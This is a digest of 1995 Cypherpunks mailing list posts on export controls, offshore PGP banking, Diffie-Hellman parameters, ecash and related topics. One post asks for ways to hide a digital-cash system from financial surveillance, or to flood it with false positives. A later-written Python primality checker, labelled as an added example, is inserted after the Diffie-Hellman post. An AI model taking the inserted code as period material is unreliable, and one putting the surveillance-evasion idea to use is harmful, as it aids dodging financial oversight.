Date: Tue, 14 Nov 1995 20:56:22 +0800
To: cypherpunks@toad.com
Subject: Getting the ITAR
Message-ID: <9511140421.AA12502@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


The front of the ITAR has this convenient phone number you can call
to get a copy: 1 703 875 6644.  I don't think anyone on this list can
claim ignorance. :)  BTW, as for Pegasus, please note that I didn't say
the author was going to get in trouble, merely that his software is
export controlled -- there's a difference.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Tue, 14 Nov 1995 13:38:27 +0800
To: cypherpunks@toad.com
Subject: Offshore Assets Reconciliation using PGP
Message-ID: <Pine.SOL.3.91.951113234809.15842A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


ENCRYPTED ON-LINE FINANCIAL TRANSACTIONS

are being offered by a Bahamian company, Offshore Assets
Reconciliation, Ltd.  As predicted by *SI*, the computer
encryption technique called PGP would result in commercial
services providing electronic transactions that are
indecipherable by any government agency.  OAR is in Nassau, and
can execute PGP instructions to move cash from bank or brokerage
accounts to bank, attorney, or escrow accounts.  It is equipped
to function throughout the Caribbean and in 20 international
financial centers such as Isle of Man, Bermuda, Cook Islands, and
Vanuatu.  For more information contact OAR at phone: (809) 356-2039,
fax: (809) 356-2095, e-mail: 71522.2715@compuserve.com.
OAR is the first of many such services to come.


*Strategic Investment*, November 15, 1995

SI is published by Agora, Inc., 824 E. Baltimore St., Baltimore
MD  21202-4799





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Tue, 14 Nov 1995 23:28:27 +0800
To: cypherpunks@toad.com
Subject: U.S. Exit Tax - SI
Message-ID: <199511141046.EAA18231@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


                  U.S.  EXIT TAXES
from Strategic Investment's Intelligence bulletins - November 15, 1995

Strategic Investment
824 E. Baltimore St.
Baltimore, MD 21202-4799

Published monthly for U.S. residents at US$109 per year.


   Republicans add barbed wire to Clinton's "Berlin Wall." SI accurately
forecasted the coming of the "exit" tax proposed by the Clinton
Administration earlier this year. Now Senate Republicans have passed an exit
tax that is even more punitive than that proposed by Clinton. Section
12441(b) of the Balanced Budget Reconciliation Act of 1995 (H.R. 2491)
adds a new layer of confiscatory taxes, succession taxes, to be imposed
upon U.S. citizens and residents. Unlike gift or estate taxes, which are
imposed upon the giver or his estate, succession taxes are imposed upon
the recipient of bequests. Under the Senate proposal, succession taxes
would be levied upon property acquired by gift or inheritance from a
former U.S. citizen or former long-term resident of the U.S. who leaves
U.S. tax jurisdiction after February, 1995. This tax would make it
financially more punitive for an American to renounce his citizenship unless
his entire family came along. It would also make it unattractive for
foreigners with close U.S. relatives to take up residence in the United States.
They would be subject to confiscatory exit taxes upon leaving.

   (Questions arise - is there any legislation that Congress can't pass or
attempt to pass? Aren't Republicans supposed to be an alternative to
Democrats?) - GLJ






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Tue, 14 Nov 1995 08:57:48 +0800
To: cypherpunks@toad.com
Subject: Cypherpunks Admissions Test
Message-ID: <199511132350.AAA01105@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Due to the large number of new subscribers, cryptogroupies, journalists, and
conspiracy freaks currently posting to Cypherpunks, it has become necessary
to restrict posting privileges on the list.  If you are contemplating a
post to cypherpunks@toad.com, please take the following test FIRST to
determine if your knowledge of cryptography and cypherpunk methodology is
sufficient to allow your participation.

Simply pick the BEST answer to EACH question.  Scoring information is
provided at the end of the test.

1)  The "Cyphernomicon" is:

	a)  Tim May's >1mb rant on the social and technical possibilities
	    of the general adoption of strong crypto.
	b)  the cypherpunk FAQ.
	c)  the 'bible' of H.P.Lovecraft's Cthulhu Mythos.
	d)  an ancient codebook once used by Julius Caesar.

2)  N.S.A stands for:

	a)  restricting the spread of strong crypto so they can spy on us
	    and keep their jobs.
	b)  No Such Agency or Not Saying Anything, I forget which.
	c)  the National Security Agency.
	d)  aren't they running the space program or something?

3)  If I wanted to keep my kid sister from reading my love letters, I'd:

	a)  encrypt them all with 128 bit key IDEA, keep them in a hidden
	    directory on an encrypted partition, keep a separate MD5 hash
	    for each one, put a firewall between the disk and the rest
            of my system, and then ...
	b)  use DES, cause it's already on my system.
	c)  use ROT 26 (TWICE as good as ROT 13, right?).
	d)  ite-wray em-thay in-ay ig-pay atin-lay.

4)  A good source of random numbers is:

	a)  radioactive decay interrupting a micro clock with a secure hash.
	b)  random mouse movements.
	c)  the system time, and the PID and PPID.
	d)  the state lottery.

5)  "Mod" stands for:

	a)  modulo.
	b)  "clock" arithmetic.
	c)  a weird kind of math that cypherpunks use to keep newbies
	    confused.
	d)  New, hip, cool.

6)   A "Certificate of Authority" is:

	a)  a type of identification that brings up all sorts of interesting
	    questions about identity, True Names, anonymity, reputations,
	    and how trustworthy electronic communication is in general.
	b)  a way of avoiding 'man in the middle' attacks.
	c)  a way to make six bucks a pop off everybody on the net.
	d)  something the Franklin Mint sends you with your hand-painted
	    limited edition Star Trek dinner plate.
    
7)  If Alice wants to send Bob her credit card number over the Internet,
    she should:

	a)  encrypt the file using at least a 2048 bit key, and transmit
	    it over a secure channel with at least application and IP level
	    encryption and authentication.
	b)  use PGP.
	c)  use a secure web server-client.
	d)  warn him ahead of time that she's going to send it backwards.

8)  If Mallet (RIP) needs to get Alice's password, he should:

	a)  hook five hundred computers together over the Internet and brute
	    force the Unix password system.
	b)  run a dictionary attack on /etc/passwd.
	c)  call her and pretend to be a system administrator.
	d)  copy it off the post-it note on her monitor.

9)  The cypherpunk motto, "Cypherpunks write code", means:

	a)  that cypherpunks are actively involved in spreading strong crypto.
	b)  that cypherpunks write programs, or maybe that they encode stuff.
	c)  that the cypherpunks mailing list is really a conspiracy to take
	    over the world, and the messages are really encoded instructions
	    to the various cells on when and where to strike.
	d)  that I can't understand 9/10ths of the things they post.

10)  On the cypherpunk list, the main medium of exchange is:

	a)  e-cash.
	b)  pgp encrypted mail.
	c)  the flame.
	d)  the T-shirt.

11)  A 'hash' is:

	a)  a function that converts an input string to a fixed size output
	    string.
	b)  a way of generating a 'digital fingerprint' of a file.
	c)  the thingie that the phone company calls a 'pound sign'.
	d)  those strange marks running down the middle of a football field.

12)  The 'munitions' T-shirt is:

	a)  a way to make the government look stupid.
	b)  a possible violation of ITAR.
	c)  a shirt with the RC4 algorithm in perl printed on the front.
	d)  a cool way to pick up intellectual chicks.

13)  ITAR, BTW, is:

	a)  a completely stupid, f*cked up way to try and stop the spread
	    of strong crypto, foisted on the world by the NSA and CIA.
	b)  the government rules restricting the export of munitions, including
	    cryptography.
	c)  the reason that I can get pgp faster from hacktic.nl than MIT.
	d)  Bob the Paver's motto over at Asphalt-R-Us.

14)  Blowfish is:

	a)  Bruce Schneier's new Feistel network symmetric encryption
	    algorithm.
	b)  a possible replacement for DES.
	c)  something I ran into in the PGPfone docs.
	d)  a good way to get food poisoning at a sushi bar.

15)  Steganography is:

	a)  the science of hiding messages in other messages.
	b)  a way of hiding information in a .gif of Cindy Crawford.
	c)  a way of hiding a nude .gif of Cindy Crawford in a fully
	    clothed .gif of Cindy Crawford.
	d)  the art of finding the cheat codes in games for the Stega
	    Genesis videogame machine.

16)  If you see a "MAKE MONEY FAST - HERE'S HOW" message, you should:

	a)  mail-bomb the offending idiot back to the abacus age.
	b)  send him several X-rated complaints via anonymous remailer.
	c)  write a polite but firm e-mail to his ISP.
	d)  forward it to cypherpunks and let the experts deal with it.

17)  A 'prime number' is:

	a)  a number evenly divisible by only one and itself.
	b)  a key component of RSA based public key encryption systems.
	c)  a number with particular properties useful in cryptography.
	d)  the blonde with the low-cut "munitions" tank-top at the local
	    espresso bar.

18)  The biggest problem with Chaum's e-cash is:

	a)  it's patented, and Chaum wants an exorbitant amount for licenses.
	b)  it protects Alice's anonymity, but not Bob's.
	c)  it's too complicated for Joe Sixpack to understand and trust.
	d)  all the free porno on the net will be pay-per-view.

19)  If a company releases a crypto product but refuses to release the
     underlying algorithms in order to protect it from attack, it's called:

	a)  snake oil.
	b)  security by obscurity.
	c)  a power one time pad.
	d)  Windows95. 

20)  A good example of a "nym" is:

	a)  Pr0duct Cypher   
	b)  Batman
	c)  Alice d'nonymous
	d)  the girl on the hotbabes IRC channel who turned out to be a guy.

To score your test, simply give yourself 4 points for each a) response, 
3 points for each b), 2 points for each c), and 1 point for each d).
Now add up your point total.  If your score is:

<20 	CLUE-REPELLANT  Try adding up your score again, and this time take
	off your shoes and socks.

20-39	CLUELESS NEWBIE  Read Tim May's "Cyphernomicon", Bruce Schneier's
	"Applied Cryptography", and the last three months archives of the
	cypherpunks mailing list - then take this test again.

40-59   YOU'RE READY  Go ahead and make your first post.  Of course, your
	ass'll get flamed anyway, but what do you care?  You've DONE your
	homework!

60-79	OLD-TIMER  You've obviously been on the list awhile, so keep on
	trucking!  

80	C'mon, Perry, why are you wasting your time on this crap?

Just e-mail this test, and your score, to:

ldetweiler@tentacles.r.us.org

You should be receiving your Cypherpunks Encoder Ring (tm) via e-mail within
three business days.      	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 14 Nov 1995 17:47:35 +0800
To: cypherpunks@toad.com
Subject: ssl-encrypted web server comparison
Message-ID: <199511140923.BAA12702@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I've started a small summary of various features of encrypting
web servers that I know about. http://www.c2.org/apachessl#compare

	Please send your comments, criticisms and suggestions. Thanks.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 14 Nov 1995 22:43:47 +0800
To: cypherpunks@toad.com
Subject: Re: coding and nnet's
Message-ID: <01HXM96ZFRDC8WXWOV@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: tcmay@got.net 13-NOV-1995 02:25:05.47:

At 11:40 PM 11/11/95, Michael Pierson wrote:

>I wouldn't be surprised to learn of somebody like FinCEN using
>neural-net systems to do pattern analysis on funds transfers and
>the like, or the NRO or NSA investing research money into
>investigating the usefulness of NNs for image processing or for
>scanning raw ELIN SIGINT or COMINT data.  In fact, I'd be quite
>surprised if they weren't.

[...]

I recall reading of some contracts let out, and other RFCs, for AI
programs for FinCEN use. Not surprising. (If I ran FinCEN, this is
what I'd surely have a bunch of folks working on. Scary thought.)
------------------------

     I find it interesting that FinCEN has a net link (at
http://www.ustreas.gov/treasury/bureaus/fincen/fincen.html). I have
heard about an IRS cash-tracking center in Detroit, where all those
$100+ cash deposits/withdrawals get sent. They probably use similar
setups for analysis, although with more of an individual focus.
     I have recently been contemplating how a private digital cash
system (either national-currency based or private-currency based)
would show up on such an analysis process. My suspicion is that it
would do so via fewer known non-cash transfers. Cash transactions
might actually increase, due to conversions between digital cash
and normal cash. On the other hand, many of those using a private
digital cash scheme may (like myself) tend to use mostly cash
anyway.
     I am interested in hearing the thoughts of others on this
subject. Particularly useful would be methods to stealth or spoof
such a system; i.e., to either hide a private digital cash system
from it, or to give it so many false positives that they couldn't
distinguish what is real and what is not. I suggest that the latter
would be easier (and would have other valuable applications).
     -Allen

P.S. Does anyone know what is up with the extropians list? Down
again, I suspect.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Tue, 14 Nov 1995 19:37:59 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <01HXMG5BM8V699JE2Z@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Fri, 10 Nov 1995 11:52:41 -0800
>From: Bill Stewart <stewarts@ix.netcom.com>
>Subject: Re: coding and nnet's

>Schneier's 2nd edition says "Neural nets aren't terribly useful for
>cryptography, primarily because of the shape of the solution space.

>Neural nets work best for problems that have a continuity of
>solutions, some better than others. This allows a neural net to
>learn, proposing better and better solutions as it does. Breaking an
>algorithm provides for very little in the way of learning
>opportunities: You either recover the key or you don't. (At least
>this is true if the algorithm is any good.)

Has anyone tried using neural nets or similar techniques for
searching for useful nonrandom properties of the round functions of
block ciphers or hash functions?  This might be useful in trying to
prepare some new kind of attack, find a balanced binary function
that is useful in using the generalization of linear cryptanalysis
discussed by Harpes, Kramer, and Massey at Eurocrypt '95, find a
better "difference" function for use in a differential attack, etc.

>Neural nets work well
>in structured environments when there is something to learn, but not
>in the high-entropy, seemingly random world of cryptography." And he
>doesn't give any references.

Merkle's paper on Khufu and Khafre addresses this idea, I think.
Merkle comments that it's not going to be useful against a full
cipher, but that it might be useful against (say) Khufu with one or
two octets.

>#				Thanks;  Bill
># Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
># Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey@delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Tue, 14 Nov 1995 09:02:19 +0800
To: cypherpunks@toad.com
Subject: 4096 bit strong prime for Diffle-Hellman
Message-ID: <Pine.SOL.3.91.951114090156.23102A-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



A bit of a ramble about Diffie-Hellman parameters.....

Just for anyone interested, I 'found' a suspected 4096 bit strong prime (p and
(p-1)/2 are prime) for use with Diffie-Hellman, generator of 2.
If anyone wants to test the primality, please let
me know if it passes.  I'm currently using the Miller-Rabin primality
test with my own bignum library.
I'm just generating some 'default' DH parameter sets for distribution
with the next version of my crypto library (SSLeay), I'll send out Phil
Karn's 1024 and 2048 bit values and this one if other people are happy
with it.

Some quick times (in seconds) for the use of a 4096 bit prime with DH on a
SGI (200mhz R4400).  The RSA operation is PKCS#1 private key encrypt, the
DH operation is a PKCS#3 public/private key generation followed by the
generation of session key, the maths routines are from SSLeay.

modulus     DH     RSA
 512      0.23   0.041
1024      1.71   0.248
2048     12.88   1.702
4096    102.18  13.150

The RSA times as you will notice are about the same speed for twice the DH
bit size.  This is due to the RSA operation being reduced to 2 a^b%m
operation where m has the values of p and q where (p-1)*(q-1) is the RSA
modulus, half the bit size. The DH operation is 2 a^b%m operations,
(generating the 'public key' and then raising by the peer's public key). 
Does any-one know of any tricks to speeding the DH operation up (not
counting implementing a better a^b%m function, I'm going to do this later
when I have time :-).  From what I can see, there is not much that can be
done except perhaps some tricks in the initial g^rand%p, since the
generator is a known value. 

Even if the private DH values are pre-calculated, this will only halve the
time of the DH operation and if this is done it loses the advantage of DH
in that if the private/public pair are 'generated on the fly',
pre-recorded session will not be able to be decoded if the private key is
revealed at a later point in time.  This is the major advantage I can see
of a DH key exchange over the use of an RSA based system so I would 
object to losing this feature. 

With these times I think that 4096 bit DH is not going to be used for
quite a while :-).

eric

The suspected 4096 bit strong prime.

In C, first byte is most significant (big endian)
unsigned char dh4096_p[]={
        0xFE,0xEA,0xD1,0x9D,0xBE,0xAF,0x90,0xF6,0x1C,0xFC,0xA1,0x06,
        0x5D,0x69,0xDB,0x08,0x83,0x9A,0x2A,0x2B,0x6A,0xEF,0x24,0x88,
        0xAB,0xD7,0x53,0x1F,0xBB,0x3E,0x46,0x2E,0x7D,0xCE,0xCE,0xFB,
        0xCE,0xDC,0xBB,0xBD,0xF5,0x65,0x49,0xEE,0x95,0x15,0x30,0x56,
        0x81,0x88,0xC3,0xD9,0x72,0x94,0x16,0x6B,0x6A,0xAB,0xA0,0xAA,
        0x5C,0xC8,0x55,0x5F,0x91,0x25,0x50,0x3A,0x18,0x0E,0x90,0x32,
        0x4C,0x7F,0x39,0xC6,0xA3,0x45,0x2F,0x31,0x42,0xEE,0x72,0xAB,
        0x7D,0xFF,0xC7,0x4C,0x52,0x8D,0xB6,0xDA,0x76,0xD9,0xC6,0x44,
        0xF5,0x5D,0x08,0x3E,0x9C,0xDE,0x74,0xF7,0xE7,0x42,0x41,0x3B,
        0x69,0x47,0x66,0x17,0xD2,0x67,0x0F,0x2B,0xF6,0xD5,0x9F,0xFC,
        0xD7,0xC3,0xBD,0xDE,0xED,0x41,0xE2,0xBD,0x2C,0xCD,0xD9,0xE6,
        0x12,0xF1,0x05,0x6C,0xAB,0x88,0xC4,0x41,0xD7,0xF9,0xBA,0x74,
        0x65,0x1E,0xD1,0xA8,0x4D,0x40,0x7A,0x27,0xD7,0x18,0x95,0xF7,
        0x77,0xAB,0x6C,0x77,0x63,0xCC,0x00,0xE6,0xF1,0xC3,0x0B,0x2F,
        0xE7,0x94,0x46,0x92,0x7E,0x74,0xBC,0x73,0xB8,0x43,0x1B,0x53,
        0x01,0x1A,0xF5,0xAD,0x15,0x15,0xE6,0x3D,0xC1,0xDE,0x83,0xCC,
        0x80,0x2E,0xCE,0x7D,0xFC,0x71,0xFB,0xDF,0x17,0x9F,0x8E,0x41,
        0xD7,0xF1,0xB4,0x3E,0xBA,0x75,0xD5,0xA9,0xC3,0xB1,0x1D,0x4F,
        0x1B,0x0B,0x5A,0x09,0x88,0xA9,0xAA,0xCB,0xCC,0xC1,0x05,0x12,
        0x26,0xDC,0x84,0x10,0xE4,0x16,0x93,0xEC,0x85,0x91,0xE3,0x1E,
        0xE2,0xF5,0xAF,0xDF,0xAE,0xDE,0x12,0x2D,0x12,0x77,0xFC,0x27,
        0x0B,0xE4,0xD2,0x5C,0x11,0x37,0xA5,0x8B,0xE9,0x61,0xEA,0xC9,
        0xF2,0x7D,0x4C,0x71,0xE2,0x39,0x19,0x04,0xDD,0x6A,0xB2,0x7B,
        0xEC,0xE5,0xBD,0x6C,0x64,0xC7,0x9B,0x14,0x6C,0x2D,0x20,0x8C,
        0xD6,0x3A,0x4B,0x74,0xF8,0xDA,0xE6,0x38,0xDB,0xE2,0xC8,0x80,
        0x6B,0xA1,0x07,0x73,0x8A,0x8D,0xF5,0xCF,0xE2,0x14,0xA4,0xB7,
        0x3D,0x03,0xC9,0x12,0x75,0xFB,0xA5,0x72,0x81,0x46,0xCE,0x5F,
        0xEC,0x01,0x77,0x5B,0x74,0x48,0x1A,0xDF,0x86,0xF4,0x85,0x4D,
        0x65,0xF5,0xDA,0x4B,0xB6,0x7F,0x88,0x2A,0x60,0xCE,0x0B,0xCA,
        0x0A,0xCD,0x15,0x7A,0xA3,0x77,0xF1,0x0B,0x09,0x1A,0xD0,0xB5,
        0x68,0x89,0x30,0x39,0xEC,0xA3,0x3C,0xDC,0xB6,0x1B,0xA8,0xC9,
        0xE3,0x2A,0x87,0xA2,0xF5,0xD8,0xB7,0xFD,0x26,0x73,0x4D,0x2F,
        0x09,0x67,0x92,0x35,0x2D,0x70,0xAD,0xE9,0xF4,0xA5,0x1D,0x84,
        0x88,0xBC,0x57,0xD3,0x2A,0x63,0x8E,0x0B,0x14,0xD6,0x69,0x3F,
        0x67,0x76,0xFF,0xFB,0x35,0x5F,0xED,0xF6,0x52,0x20,0x1F,0xA7,
        0x0C,0xB8,0xDB,0x34,0xFB,0x54,0x94,0x90,0x95,0x1A,0x70,0x1E,
        0x04,0xAD,0x49,0xD6,0x71,0xB7,0x4D,0x08,0x9C,0xAA,0x8C,0x0E,
        0x5E,0x83,0x3A,0x21,0x29,0x1D,0x69,0x78,0xF9,0x18,0xF2,0x5D,
        0x5C,0x76,0x9B,0xDB,0xE4,0xBB,0x72,0xA8,0x4A,0x1A,0xFE,0x6A,
        0x0B,0xBA,0xD1,0x8D,0x3E,0xAC,0xC7,0xB4,0x54,0xAF,0x40,0x8D,
        0x4F,0x1C,0xCB,0x23,0xB9,0xAE,0x57,0x6F,0xDA,0xE2,0xD1,0xA6,
        0x8F,0x43,0xD2,0x75,0x74,0x1D,0xB1,0x9E,0xED,0xC3,0xB8,0x1B,
        0x5E,0x56,0x96,0x4F,0x5F,0x8C,0x33,0x63,
        };
unsigned char dh4096_g[]={
        0x02,
        };

Or as a ASN.1 encoded pkcs#3 object.


eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)
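
The primality check requested in the message above, as an added example that is not code from the post or from SSLeay: it parses a PKCS#3 `DH PARAMETERS` PEM block and runs Miller-Rabin on both p and (p-1)/2, then reports which subgroup the generator spans. All function names and the toy sample parameters (p = 2039, g = 2) are constructed for illustration.

```python
import base64
import random

BEGIN = "-----BEGIN DH PARAMETERS-----"
END = "-----END DH PARAMETERS-----"
# Constructed toy input (not the posted prime): SEQUENCE { p = 2039, g = 2 }.
SAMPLE_PEM = BEGIN + "\nMAcCAgf3AgEC\n" + END
SMALL_PRIMES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)

def _der_len(n):
    """DER length: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def _der_int(n):
    """Non-negative INTEGER; the byte count keeps the sign bit clear."""
    body = n.to_bytes(n.bit_length() // 8 + 1, "big")
    return b"\x02" + _der_len(len(body)) + body

def encode_dh_pem(p, g):
    """Build a PKCS#3 DHParameter SEQUENCE { p, g } and PEM-wrap it."""
    body = _der_int(p) + _der_int(g)
    b64 = base64.b64encode(b"\x30" + _der_len(len(body)) + body).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "\n".join([BEGIN, *lines, END])

def _read_len(der, i):
    """Decode a DER length at offset i; return (length, next offset)."""
    first = der[i]
    if first < 0x80:
        return first, i + 1
    n = first & 0x7F
    if not 1 <= n <= 4:
        raise ValueError("unsupported DER length")
    return int.from_bytes(der[i + 1:i + 1 + n], "big"), i + 1 + n

def _read_int(der, i):
    """Decode an INTEGER at offset i; return (value, next offset)."""
    if i >= len(der) or der[i] != 0x02:
        raise ValueError("expected INTEGER")
    length, i = _read_len(der, i + 1)
    if i + length > len(der):
        raise ValueError("truncated INTEGER")
    return int.from_bytes(der[i:i + length], "big", signed=True), i + length

def parse_dh_pem(pem):
    """Return (p, g) from a DH PARAMETERS PEM block."""
    lines = [ln.strip() for ln in pem.strip().splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0] != BEGIN or lines[-1] != END:
        raise ValueError("not a DH PARAMETERS PEM block")
    der = base64.b64decode("".join(lines[1:-1]), validate=True)
    if len(der) < 2 or der[0] != 0x30:
        raise ValueError("expected SEQUENCE")
    length, i = _read_len(der, 1)
    if i + length != len(der):
        raise ValueError("SEQUENCE length does not match data")
    p, i = _read_int(der, i)
    g, i = _read_int(der, i)  # an optional privateValueLength may follow
    return p, g

def is_probable_prime(n, rounds=40):
    """Miller-Rabin with random bases; error probability <= 4**-rounds."""
    if n < 2:
        return False
    for sp in SMALL_PRIMES:
        if n % sp == 0:
            return n == sp
    d, s = n - 1, 0
    while d % 2 == 0:
        d, s = d // 2, s + 1
    rng = random.SystemRandom()
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False  # this base is a witness: n is composite
    return True

def check_dh_params(p, g):
    """Report whether p is a safe prime and which subgroup g generates."""
    q = (p - 1) // 2
    p_prime = is_probable_prime(p)
    q_prime = p_prime and p % 2 == 1 and is_probable_prime(q)
    report = {"bits": p.bit_length(), "p_prime": p_prime, "q_prime": q_prime,
              "safe_prime": p_prime and q_prime,
              "g_in_range": 1 < g < p - 1, "g_order": None}
    if report["safe_prime"] and report["g_in_range"]:
        # For p = 2q + 1 the order of g is q or 2q; g^q mod p tells which.
        report["g_order"] = "q" if pow(g, q, p) == 1 else "2q"
    return report

if __name__ == "__main__":
    print(check_dh_params(*parse_dh_pem(SAMPLE_PEM)))
    print(check_dh_params(2**127 - 1, 2))  # prime, but (p-1)/2 is not
```

A Miller-Rabin pass only says "probably prime"; a second, independent implementation agreeing on both p and (p-1)/2 is what the request for outside testing buys.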





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 15 Nov 1995 13:54:59 +0800
To: cypherpunks@toad.com
Subject: Re: ecash speed
Message-ID: <199511112122.NAA02204@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:21 PM 11/9/95 -0800, jim bell wrote:

>I think that one thing that's needed is the concept of probabilistic payments.

Problem:  If the recipient verifies the coin infrequently, then someone 
can browse with slugs, accepting a modest probability of random URL
failure.

If the recipient verifies the coin regularly, then the cost of 
verification is still the same as ever.

Another poster earlier suggested the following solution, which seems
to me much better:  When you access the home page of the Playboy 
dirty pictures web site, you automatically buy a bunch of 
seemingly random numbers from them:  Every time you click on a 
URL, you spend one or more of their numbers.  If you have some 
left over when you are through, you can keep them or cash them.

This would mean two expensive transactions (high calculation and 
communication costs) per provider, instead of one expensive transaction
per click.

It also means that providers could make their tokens as cheap or expensive
as they wished, down to microcents if they felt so inclined.

It also means that every shop around the world would be issuing 
their own money, making it impossible to trace anything in practice
even if everything was traceable in principle.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 15 Nov 1995 13:53:20 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Who needs time vaults anyway?
In-Reply-To: <v02120d05accab753260f@[199.0.65.105]>
Message-ID: <Pine.SOL.3.91.951111130652.15607B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 11 Nov 1995, Robert Hettinga wrote:

> In the real world, there's a trustee/nominee of some sort who does this.
> What's that to keep that from happening on the net, just like our much
> maligned (guy's gotta make a living, fer chrissake!) assassination-payoff
> escrow agent...

Nothing really;  It would probably be better to do some sort of secret 
sharing and use a number of somewhat trusted escrow-agents, but the 
protocols aren't too complex. 

For the simple case where the release is time based, you could even make 
the process totally automatic; just have the escrow agents send off their 
bits of the key when the time has expired, and voila.

As for real time-release - how about just using conventional encryption, 
and require it to be brute-forced?

Depending on how fine grained you want the release to be, you could also 
take the inverse of Moore's law, work out how big a key you need to have 
it unbreakable in less than the desired time, add in whatever fudge 
factors you feel like based on how much it would be worth to the opponent 
to get early access, then lock up the secret and throw away the key. 

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Wed, 15 Nov 1995 13:55:55 +0800
To: cypherpunks@toad.com
Subject: Re: the revolution of microcurrency
Message-ID: <9511112128.AA29071@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From Thomas Junker (in reply to Vlad):

> this same idea works with software. you don't see
> software as an end product. you see it as something that
> is evolving over time. and whenever you send money to a
> company for software, in this new system the idea is that
> "I like this software, and I want to see it grow. here
> is my contribution to that".

People as marketplace players do not think like that.  
....................................................

This is a very important point to consider:  how a person as a customer will 
_actually_ think.  

It is easy enough to propose schemes based on one's preferences of how one 
would like a potential customer to make decisions about services, products, and 
methods of payment for what is offered.  But doing the customer's thinking for 
them doesn't automatically transform them into that line of reasoning.

To better compute whether they will proceed according to how you have imagined, 
it is more realistic to consider how the other person reasons on the 
circumstance they are facing - from their perspective.    

Market researchers actually carry out tests for consumer response and 
acceptance of products or payment schemes in order to gauge their success.  And 
there are many kinds of potential customers, who will make different decisions 
in regard of the same thing:  some will find it a good idea to think about 
software in terms of "contributing to its growth" in the longterm, but some 
will have immediate needs which they are trying to satisfy and may think "I 
need a solution to my problem *right now*" and will look for the 
product/service which will solve their problem as it stands in the present.

This is another attractive feature of "the free market":  in it one can find 
all sorts of schemes & methods for solving all sorts of problems in different 
ways.  There is no single type of consumer, no single circumstance, no one 
service or product or scheme which will satisfy everyone, equally, at all 
times.  

"May the Best Man Win", and "To the Victor Belong the Spoils".  <g>

  ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David A Wagner <daw@CS.Berkeley.EDU>
Date: Wed, 15 Nov 1995 13:59:53 +0800
To: weidai@eskimo.com
Subject: Re: Diffie-Hellman in GF(2^n)?
Message-ID: <199511122243.OAA18565@delhi.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.SUN.3.91.951110184600.19312B-100000@eskimo.com> you write:
> Most Diffie-Hellman implementations currently use the multiplicative group
> of prime fields.  However, the multiplicative group of finite fields of
> characteristic 2 (GF(2^n)) can also be used and should be easier to
> implement.  Is there any reason why they should not be used?  Does anyone
> know the asymptotic running time of the best algorithm for calculating
> discrete logarithms in GF(2^n)? 

I remember that the discrete log problem is quite a bit easier
in GF(2^n), but I don't remember how much easier.   Let me try
to look it up...

A. Odlyzko has a paper recommending that people should not use
GF(2^n) for discrete log applications; in it he states that you
will need at the minimum n > 800, and probably n > 1500.  (And
you also need to choose n carefully.)  A quote from the abstract:

``Hence the fields GF(2^n) ought to be avoided in all cryptographic
applications.''

I don't know enough about number theory to judge for myself;
but you can read the (long) paper yourself at

	ftp://netlib.att.com/netlib/att/math/odlyzko/discrete.logs.ps.Z

I hope this helps!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
